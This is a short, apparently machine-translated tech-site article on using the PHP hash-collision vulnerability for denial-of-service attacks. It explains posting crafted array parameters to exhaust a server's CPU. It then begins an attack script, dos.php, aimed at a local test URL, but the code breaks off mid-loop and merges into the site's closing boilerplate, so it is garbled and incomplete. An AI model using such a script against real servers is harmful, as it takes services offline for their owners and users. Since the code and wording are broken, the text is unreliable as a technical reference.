Shulou(Shulou.com)06/03 Report--

Editor to share with you how PHP uses hash conflict vulnerabilities to carry out DDoS attacks, I believe most people do not know much about it, so share this article for your reference. I hope you will gain a lot after reading this article. Let's learn about it together.

The specific analysis is as follows:

First of all, declare: the content of this article is only for research, study and use, do not use it for illegal behavior!

As mentioned earlier, the recently exposed hash table collision vulnerabilities, including java, python, php, and many other common languages are not immune, tonight we will actually take a look at its power.

Attack principle:

Through a set of carefully cobbled array parameters to the target server post, when the underlying language processes the received array parameters after arriving at the server, the existence of this vulnerability results in a large consumption of CPU, which eventually leads to the exhaustion of server resources.

Do not use any fancy tricks, just use PHP to simply achieve the effect, click to stop.

File: dos.php

/ / destination address / / as long as the destination address exists, regardless of what it is $host = 'http://127.0.0.1/test.php';$data ='; $size = pow (2,15); for ($key=0, $max= ($size-1) * $size; $key and above is all the contents of the article "how PHP exploits hash conflict vulnerabilities to attack DDoS". Thank you for reading! I believe we all have a certain understanding, hope to share the content to help you, if you want to learn more knowledge, welcome to follow the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.